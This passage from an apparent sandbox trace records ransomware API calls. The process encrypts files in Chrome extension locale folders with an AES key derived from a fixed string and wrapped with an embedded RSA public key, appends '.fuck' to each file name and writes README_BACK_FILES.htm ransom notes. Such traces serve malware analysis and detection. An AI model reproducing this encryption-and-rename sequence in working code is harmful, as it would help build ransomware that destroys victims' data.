data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\messages.json.fuck")) returned 1 [0254.599] CryptDestroyHash (hHash=0x2e18468) returned 1 [0254.599] CryptDestroyKey (hKey=0x2e18568) returned 1 [0254.600] CryptReleaseContext (hProv=0x2e176a0, dwFlags=0x0) returned 1 [0254.600] FindNextFileA (in: hFindFile=0x2e18768, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0254.600] FindClose (in: hFindFile=0x2e18768 | out: hFindFile=0x2e18768) returned 1 [0254.600] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\readme_back_files.htm")) returned 0xffffffff [0254.600] AreFileApisANSI () returned 1 [0254.600] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0254.600] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0254.601] GetFileType (hFile=0x5d50) returned 0x1 [0254.601] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0254.603] FindNextFileA (in: hFindFile=0x2e182e8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0254.603] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e18468 [0254.603] FindNextFileA (in: hFindFile=0x2e18468, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0254.603] FindNextFileA (in: hFindFile=0x2e18468, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0254.603] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0254.603] GetLastError () returned 0x0 [0254.603] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\messages.json")) returned 0x20 [0254.604] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\messages.json", dwFileAttributes=0x80) returned 1 [0254.605] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0254.606] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0254.607] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0254.608] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e176a0) returned 1 [0254.611] CryptCreateHash (in: hProv=0x2e176a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0254.611] lstrlenA (lpString="zthKOztpbIbcaEcLZlwCTDmazMlQm") returned 29 [0254.611] CryptHashData (hHash=0x2e184e8, pbData=0x28cb3a0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0254.611] CryptDeriveKey (in: hProv=0x2e176a0, Algid=0x6610, hBaseData=0x2e184e8, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e18568) returned 1 [0254.611] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0254.611] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0254.611] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e17948) returned 1 [0254.612] CryptImportPublicKeyInfo (in: hCryptProv=0x2e17948, dwCertEncodingType=0x1, pInfo=0x298fed0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x298ff00*, PublicKey.cbData=0x8c, PublicKey.pbData=0x298ff08*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e18768) returned 1 [0254.612] CryptEncrypt (in: hKey=0x2e18768, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0254.612] CryptEncrypt (in: hKey=0x2e18768, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e177b0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e177b0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0254.612] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e177b0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e177b0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0254.613] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x98, lpOverlapped=0x0) returned 1 [0254.615] CryptEncrypt (in: hKey=0x2e18568, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x98, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xa0) returned 1 [0254.615] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xa0, lpOverlapped=0x0) returned 1 [0254.615] CloseHandle (hObject=0x5d60) returned 1 [0254.615] CloseHandle (hObject=0x5d5c) returned 1 [0254.615] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\messages.json"), bFailIfExists=0) returned 1 [0254.621] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\messages.json", dwFileAttributes=0x0) returned 1 [0254.622] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\messages.json.gsg")) returned 1 [0254.623] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\messages.json.fuck")) returned 1 [0254.624] CryptDestroyHash (hHash=0x2e184e8) returned 1 [0254.625] CryptDestroyKey (hKey=0x2e18568) returned 1 [0254.625] CryptReleaseContext (hProv=0x2e176a0, dwFlags=0x0) returned 1 [0254.625] FindNextFileA (in: hFindFile=0x2e18468, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0254.625] FindClose (in: hFindFile=0x2e18468 | out: hFindFile=0x2e18468) returned 1 [0254.625] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\readme_back_files.htm")) returned 0xffffffff [0254.625] AreFileApisANSI () returned 1 [0254.625] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3460, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0254.625] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0254.626] GetFileType (hFile=0x5d50) returned 0x1 [0254.626] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0254.628] FindNextFileA (in: hFindFile=0x2e182e8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0254.628] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e18468 [0254.629] FindNextFileA (in: hFindFile=0x2e18468, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0254.629] FindNextFileA (in: hFindFile=0x2e18468, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0254.629] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0254.630] GetLastError () returned 0x0 [0254.630] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\messages.json")) returned 0x20 [0254.630] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\messages.json", dwFileAttributes=0x80) returned 1 [0254.631] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0254.631] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0254.632] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0254.632] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e176a0) returned 1 [0254.635] CryptCreateHash (in: hProv=0x2e176a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0254.635] lstrlenA (lpString="zthKOztpbIbcaEcLZlwCTDmazMlQm") returned 29 [0254.635] CryptHashData (hHash=0x2e184e8, pbData=0x28cb3c8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0254.635] CryptDeriveKey (in: hProv=0x2e176a0, Algid=0x6610, hBaseData=0x2e184e8, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e186a8) returned 1 [0254.635] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0254.636] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0254.636] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e17e10) returned 1 [0254.636] CryptImportPublicKeyInfo (in: hCryptProv=0x2e17e10, dwCertEncodingType=0x1, pInfo=0x2990620*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2990650*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2990658*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e18568) returned 1 [0254.636] CryptEncrypt (in: hKey=0x2e18568, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0254.636] CryptEncrypt (in: hKey=0x2e18568, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e17a58*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e17a58*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0254.637] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e17a58*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e17a58*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0254.638] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xff, lpOverlapped=0x0) returned 1 [0254.640] CryptEncrypt (in: hKey=0x2e186a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xff, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x100) returned 1 [0254.640] WriteFile (in: hFile=0x5d60, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x100, lpOverlapped=0x0) returned 1 [0254.640] CloseHandle (hObject=0x5d5c) returned 1 [0254.640] CloseHandle (hObject=0x5d60) returned 1 [0254.640] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\messages.json"), bFailIfExists=0) returned 1 [0254.645] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\messages.json", dwFileAttributes=0x0) returned 1 [0254.646] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\messages.json.gsg")) returned 1 [0254.647] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\messages.json.fuck")) returned 1 [0254.648] CryptDestroyHash (hHash=0x2e184e8) returned 1 [0254.648] CryptDestroyKey (hKey=0x2e186a8) returned 1 [0254.648] CryptReleaseContext (hProv=0x2e176a0, dwFlags=0x0) returned 1 [0254.649] FindNextFileA (in: hFindFile=0x2e18468, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0254.649] FindClose (in: hFindFile=0x2e18468 | out: hFindFile=0x2e18468) returned 1 [0254.649] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\readme_back_files.htm")) returned 0xffffffff [0254.649] AreFileApisANSI () returned 1 [0254.649] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0254.649] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0254.651] GetFileType (hFile=0x5d50) returned 0x1 [0254.651] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0254.652] FindNextFileA (in: hFindFile=0x2e182e8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0254.653] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e18468 [0254.653] FindNextFileA (in: hFindFile=0x2e18468, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0254.653] FindNextFileA (in: hFindFile=0x2e18468, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0254.653] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0254.653] GetLastError () returned 0x0 [0254.653] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\messages.json")) returned 0x20 [0254.654] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\messages.json", dwFileAttributes=0x80) returned 1 